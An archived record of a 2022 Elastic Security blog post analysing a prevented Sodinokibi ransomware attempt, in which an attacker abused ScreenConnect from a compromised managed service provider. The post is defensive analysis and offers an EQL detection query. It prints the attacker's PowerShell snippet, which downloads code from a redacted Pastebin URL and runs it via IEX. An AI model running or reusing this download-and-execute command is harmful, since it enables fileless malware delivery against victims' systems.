{
	"id": "502ba569-34e2-4c52-8550-69391519b209",
	"created_at": "2026-04-10T03:21:12.622238Z",
	"updated_at": "2026-04-10T03:22:16.868472Z",
	"deleted_at": null,
	"sha1_hash": "07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e",
	"title": "Ransomware, interrupted: Sodinokibi and the supply chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 964125,
	"plain_text": "Ransomware, interrupted: Sodinokibi and the supply chain\r\nBy David French\r\nPublished: 2022-06-02 · Archived: 2026-04-10 02:48:06 UTC\r\nLast month, the Elastic Security Protections Team prevented an attempted ransomware attack targeting an\r\norganization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts\r\nthat were generated after an adversary’s process injection attempts were prevented by Elastic Endpoint Security on\r\nseveral endpoints. Adversaries often attempt to inject their malicious code into a running process before\r\nencrypting and holding the victim’s data to ransom.\r\nThe behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in\r\norder to deploy ransomware at an enterprise scale. By abusing the trust relationships between MSPs and their\r\ncustomers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with\r\ntransportation, or even disrupting a critical municipal public service.\r\nIt is important to note in this case that the adversary accessed the target environment via another MSP, who is not\r\nan Elastic Security customer — we do not have specific details about that environment or how it may have been\r\ncompromised.\r\nIn this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often\r\nsuccessful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.\r\nElastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses\r\nanonymized security telemetry from participating customers to track threats and improve products, a\r\nfunction that includes collecting alert metadata. 
By monitoring patterns of events affecting many\r\ncustomers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging\r\nthreats or provide the community with essential information.\r\nPreventing malicious process injection\r\nThe earliest evidence of compromise was detected when several process injection attempts were prevented.\r\nProcess injection can be used to execute code in the address space of a running process. Adversaries often execute\r\nthis technique in an attempt to avoid detection by security products, or to run their malicious code in a process\r\nrunning at a higher integrity level to elevate their privileges.\r\nProcess Injection alerts in the Elastic Endpoint Security platform\r\nhttps://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain\r\nPage 1 of 5\n\nAnalyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was\r\nleveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. The powershell.exe\r\nprocess was created as a descendant of ScreenConnect.WindowsClient.exe — a remote desktop support\r\napplication. This type of software is used to allow IT administrators to connect to remote computers and provide\r\nsupport to end users, but applications like this are often abused by adversaries — a tactic known as “living off the\r\nland.”\r\nThe figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization\r\nthat displays events associated with an attack.\r\nResolver™ showing the process lineage associated with the Process Injection attempt\r\nNotice that cmd.exe and powershell.exe are both descendants of the ScreenConnect.WindowsClient.exe process.\r\nThis is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not\r\nnecessarily indicate malicious activity. 
Baselining your environment and understanding normal process\r\nrelationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.\r\nIn this case, reviewing the processes and their command line arguments revealed that the adversary leveraged\r\nScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of\r\nthe cmd.exe processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script\r\nthat was subsequently executed.\r\nDetecting and preventing unwanted behaviors with EQL\r\nWhile this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak,\r\nmany MSPs are still coming to grips with this methodology. This adversary understands that service providers\r\noften have implicit trust with their customers and that makes providers of all kinds valuable.\r\nOnce an adversary has obtained initial access to their target environment, it is typical for them to seek out and\r\nabuse implicit trust relationships as seen in this case. The victim organization trusts the connections to their\r\nenvironment from their MSP via the remote desktop support application, which introduces the risk of supply chain\r\ncompromise.\r\nWhen considering how to monitor and defend these trust relationships, focusing on applications that connect from\r\nthe trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect\r\nmay not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel\r\nfrom being effective. However, a security monitoring team may decide that a descendant process of\r\nScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. 
This is\r\npossible using Elastic’s Event Query Language (EQL) and is a generic approach to developing environmental\r\nawareness.\r\nThe following EQL query searches for a sequence of two events that are tied together using the process’s unique\r\nprocess ID (PID). The first event looks for a process that is a descendant of ScreenConnect*.exe. The second\r\nevent looks for network activity from the descendant process. This query can easily be expanded to include other\r\nremote access software or filter expected activity in your environment.\r\nsequence by unique_pid\r\n [process where descendant of [process where process_name == \"ScreenConnect*.exe\"]]\r\n [network where true]\r\nWith Elastic Endpoint Security, it is also possible to configure a Reflex response action, which is a way for\r\ncustomers to implement their own custom prevention rules. For example, we can kill the descendant process when\r\nit establishes a network connection, which would prevent additional malicious code from being downloaded or\r\ncommand and control activity.\r\nConfiguring a Reflex response action in the Elastic Endpoint Security platform\r\nElastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and\r\nprevent abnormal process relationships involving third-party administrative tools or binaries that are native to the\r\nWindows, MacOS, or Linux operating systems.\r\nAnalysis of adversary tradecraft\r\nThe PowerShell script that was executed checked the processor architecture before utilizing the .NET WebClient\r\nclass to download content from Pastebin and the Invoke-Expression (IEX) cmdlet to execute code. This is a\r\npopular technique amongst adversaries for downloading and executing code via PowerShell.\r\nPastebin is a plain text hosting and sharing service where legitimate users often share code snippets. 
However,\r\nmalicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.\r\nIf ($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64') {\r\n Start-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((\r\n} else {\r\n IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));\r\n Invoke-LJJJIWVSRIMKPOD;\r\n Start-Sleep -s 1000000;\r\n}\r\nPowerShell script that downloaded content1 from pastebin.com\r\nThis behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that\r\noccurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects\r\nand extracts the staged injected code and strings. This feature ensured that we had full visibility into the behavior\r\nbeing prevented.\r\nSearching VirusTotal for some of the collected strings surfaced several specimens from the Sodinokibi\r\nransomware family.\r\nThe following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the\r\nSodinokibi or Gandcrab ransomware specimens as reported by BleepingComputer and Cynet:\r\nThe malicious actor utilized ScreenConnect remote desktop support software to connect from a\r\ncompromised MSP to the target enterprise.\r\nScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to\r\ndownload and inject malicious code from Pastebin.\r\nThe PowerShell script contained cmdlets and strings (e.g., Invoke-LJJJIWVSRIMKPOD and Start-Sleep)\r\nthat have been observed in other Sodinokibi ransomware campaigns.\r\nThe strings that were collected from the injected threads are consistent with Sodinokibi ransomware\r\nsamples that were submitted to VirusTotal within the last 24 hours.\r\nAfter the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack 
on the\r\ninitial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same\r\nprocedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were\r\nprevented.\r\nConclusion\r\nIn this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and\r\nits customers and attempting to deploy ransomware. This highlights the importance of understanding the\r\nrelationships that your organization has with third parties and the potential impact if those connections are abused.\r\nAnalyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop\r\nsupport software and executed a malicious script with the intention of downloading, injecting, and executing\r\nransomware. All of the adversary’s attempts were prevented.\r\nThis case also demonstrates the importance of having a layered approach to security and being able to detect and\r\nprevent adversary behavior and fileless attacks. We dissected the attacker’s procedures and showed how EQL and\r\nReflex can be used to create custom rules and responses.\r\nLooking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.\r\nEQL support is being added to Elasticsearch.\r\n1 — The content has since been removed from Pastebin by its creator or the Pastebin staff\r\nSource: https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain"
	],
	"report_names": [
		"ransomware-interrupted-sodinokibi-and-the-supply-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775791272,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.pdf",
		"text": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.txt",
		"img": "https://archive.orkl.eu/07ad50baa473e3e876c4b0a6e58aeaefc55e8b0e.jpg"
	}
}